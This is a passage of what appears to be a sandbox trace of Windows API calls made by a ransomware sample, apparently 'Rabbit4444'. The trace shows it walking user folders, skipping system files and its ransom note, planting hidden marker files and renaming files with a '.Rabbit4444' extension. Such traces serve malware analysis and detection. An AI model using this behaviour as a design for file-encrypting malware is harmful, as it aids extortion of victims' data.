dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.835] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.835] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.836] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.836] CloseHandle (hObject=0x278) returned 1 [0052.836] CloseHandle (hObject=0x27c) returned 1 [0052.836] GetCurrentThreadId () returned 0xd98 [0052.836] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xea710 [0052.836] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0052.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0052.836] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.836] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0052.836] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\" [0052.837] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3" [0052.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.840] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.842] FlushFileBuffers (hFile=0x27c) returned 1 [0052.843] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.843] CloseHandle (hObject=0x27c) returned 1 [0052.844] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned 55 [0052.844] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.844] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8d0e35b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.844] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.844] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.844] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.844] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.844] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15925c1b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xe8d0e35b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.844] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.844] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.844] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.844] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.844] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.844] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8d0e35b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8d0e35b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8d0e35b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.844] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.844] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.844] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7631bb1a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x764e57d2, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x764e57d2, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="con2.LNK", cAlternateFileName="")) returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="Rabbit4444.exe") returned -1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2=".") returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="..") returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="windows") returned -1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="bootmgr") returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="pagefile.sys") returned -1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="boot") returned 1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="ids.txt") returned -1 [0052.844] lstrcmpiW (lpString1="con2.LNK", lpString2="NTUSER.DAT") returned -1 [0052.844] lstrcpyW (in: lpString1=0x130eba8, lpString2="con2.LNK" | out: lpString1="con2.LNK") returned="con2.LNK" [0052.845] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\con2.LNK", dwFileAttributes=0x0) returned 1 [0052.845] lstrlenW (lpString="con2.LNK") returned 8 [0052.845] lstrlenW (lpString="Rabbit4444") returned 10 [0052.845] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0052.845] lstrlenW (lpString=".dll") returned 4 [0052.845] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.845] lstrlenW (lpString=".lnk") returned 4 [0052.846] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.846] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f06972b, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x9db38c07, ftLastAccessTime.dwHighDateTime=0x1d3aafb, ftLastWriteTime.dwLowDateTime=0x9db5ee53, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x447, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Database1.LNK", cAlternateFileName="DATABA~1.LNK")) returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="Rabbit4444.exe") returned -1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2=".") returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="..") returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="windows") returned -1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="bootmgr") returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="pagefile.sys") returned -1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="boot") returned 1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="ids.txt") returned -1 [0052.846] lstrcmpiW (lpString1="Database1.LNK", lpString2="NTUSER.DAT") returned -1 [0052.846] lstrcpyW (in: lpString1=0x130eba8, lpString2="Database1.LNK" | out: lpString1="Database1.LNK") returned="Database1.LNK" [0052.846] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Database1.LNK", dwFileAttributes=0x0) returned 1 [0052.846] lstrlenW (lpString="Database1.LNK") returned 13 [0052.846] lstrlenW (lpString="Rabbit4444") returned 10 [0052.846] lstrcmpiW (lpString1="abase1.LNK", lpString2="Rabbit4444") returned -1 [0052.846] lstrlenW (lpString=".dll") returned 4 [0052.846] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.846] lstrlenW (lpString=".lnk") returned 4 [0052.846] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.846] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a21569, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x33a21569, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x33a477c8, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x3ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents.LNK", cAlternateFileName="DOCUME~1.LNK")) returned 1 [0052.846] lstrcmpiW (lpString1="Documents.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.846] lstrcmpiW (lpString1="Documents.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.846] lstrcmpiW (lpString1="Documents.LNK", lpString2="Rabbit4444.exe") returned -1 [0052.846] lstrcmpiW (lpString1="Documents.LNK", lpString2=".") returned 1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="..") returned 1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="windows") returned -1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="bootmgr") returned 1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="pagefile.sys") returned -1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="boot") returned 1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="ids.txt") returned -1 [0052.847] lstrcmpiW (lpString1="Documents.LNK", lpString2="NTUSER.DAT") returned -1 [0052.847] lstrcpyW (in: lpString1=0x130eba8, lpString2="Documents.LNK" | out: lpString1="Documents.LNK") returned="Documents.LNK" [0052.847] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Documents.LNK", dwFileAttributes=0x0) returned 1 [0052.847] lstrlenW (lpString="Documents.LNK") returned 13 [0052.847] lstrlenW (lpString="Rabbit4444") returned 10 [0052.847] lstrcmpiW (lpString1="uments.LNK", lpString2="Rabbit4444") returned 1 [0052.848] lstrlenW (lpString=".dll") returned 4 [0052.848] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.848] lstrlenW (lpString=".lnk") returned 4 [0052.848] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.848] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee8b468d, ftCreationTime.dwHighDateTime=0x1d47c36, ftLastAccessTime.dwLowDateTime=0xee8b468d, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee9bf3e2, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x5cc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Global.LNK", cAlternateFileName="")) returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="Rabbit4444.exe") returned -1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2=".") returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="..") returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="windows") returned -1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="bootmgr") returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="pagefile.sys") returned -1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="boot") returned 1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="ids.txt") returned -1 [0052.848] lstrcmpiW (lpString1="Global.LNK", lpString2="NTUSER.DAT") returned -1 [0052.848] lstrcpyW (in: lpString1=0x130eba8, lpString2="Global.LNK" | out: lpString1="Global.LNK") returned="Global.LNK" [0052.848] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK", dwFileAttributes=0x0) returned 1 [0052.849] lstrlenW (lpString="Global.LNK") returned 10 [0052.849] lstrlenW (lpString="Rabbit4444") returned 10 [0052.849] lstrcmpiW (lpString1="Global.LNK", lpString2="Rabbit4444") returned -1 [0052.849] lstrlenW (lpString=".dll") returned 4 [0052.849] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.849] lstrlenW (lpString=".lnk") returned 4 [0052.849] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.849] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x15a7d124, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a7d124, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xee9bf3e2, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="Rabbit4444.exe") returned -1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2=".") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="..") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="windows") returned -1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="bootmgr") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="pagefile.sys") returned -1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="boot") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="ids.txt") returned 1 [0052.849] lstrcmpiW (lpString1="index.dat", lpString2="NTUSER.DAT") returned -1 [0052.849] lstrcpyW (in: lpString1=0x130eba8, lpString2="index.dat" | out: lpString1="index.dat") returned="index.dat" [0052.849] lstrlenW (lpString="index.dat") returned 9 [0052.849] lstrlenW (lpString="Rabbit4444") returned 10 [0052.849] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0052.849] lstrlenW (lpString=".dll") returned 4 [0052.849] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0052.849] lstrlenW (lpString=".lnk") returned 4 [0052.850] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0052.850] lstrlenW (lpString=".ini") returned 4 [0052.850] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0052.850] lstrlenW (lpString=".sys") returned 4 [0052.850] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0052.850] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.850] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.850] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14416064505) returned 1 [0052.850] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=141) returned 1 [0052.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.850] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0052.850] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName=0x0) returned 0x298 [0052.852] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x390) returned 0x70000 [0052.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.852] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.852] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0052.853] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0052.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.853] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14416365866) returned 1 [0052.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.853] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0052.853] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.853] CloseHandle (hObject=0x298) returned 1 [0052.853] CloseHandle (hObject=0x278) returned 1 [0052.853] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.Rabbit4444") returned 76 [0052.853] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.rabbit4444"), dwFlags=0x1) returned 1 [0052.854] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0aa18, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a0aa18, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a7d124, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="Rabbit4444.exe") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2=".") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="..") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="windows") returned -1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="bootmgr") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="pagefile.sys") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="boot") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="ids.txt") returned 1 [0052.854] lstrcmpiW (lpString1="Templates.LNK", lpString2="NTUSER.DAT") returned 1 [0052.854] lstrcpyW (in: lpString1=0x130eba8, lpString2="Templates.LNK" | out: lpString1="Templates.LNK") returned="Templates.LNK" [0052.854] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK", dwFileAttributes=0x0) returned 1 [0052.854] lstrlenW (lpString="Templates.LNK") returned 13 [0052.854] lstrlenW (lpString="Rabbit4444") returned 10 [0052.854] lstrcmpiW (lpString1="plates.LNK", lpString2="Rabbit4444") returned -1 [0052.854] lstrlenW (lpString=".dll") returned 4 [0052.855] lstrcmpiW (lpString1=".LNK", lpString2=".dll") returned 1 [0052.855] lstrlenW (lpString=".lnk") returned 4 [0052.855] lstrcmpiW (lpString1=".LNK", lpString2=".lnk") returned 0 [0052.855] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a0aa18, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x15a0aa18, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x15a7d124, ftLastWriteTime.dwHighDateTime=0x1d327b6, nFileSizeHigh=0x0, nFileSizeLow=0x493, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates.LNK", cAlternateFileName="TEMPLA~1.LNK")) returned 0 [0052.855] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.855] lstrcpyW (in: lpString1=0x130eba8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.855] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Office\\Recent\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\office\\recent\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.855] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.855] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.855] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.855] CloseHandle (hObject=0x278) returned 1 [0052.855] CloseHandle (hObject=0x27c) returned 1 [0052.856] GetCurrentThreadId () returned 0xd98 [0052.856] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf64b0 [0052.856] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" [0052.856] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103988 | out: hHeap=0xe0000) returned 1 [0052.856] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf64a8 | out: hHeap=0xe0000) returned 1 [0052.856] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network" [0052.856] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\" [0052.856] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" [0052.856] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\network\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.857] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.859] FlushFileBuffers (hFile=0x27c) returned 1 [0052.860] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Network\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.861] CloseHandle 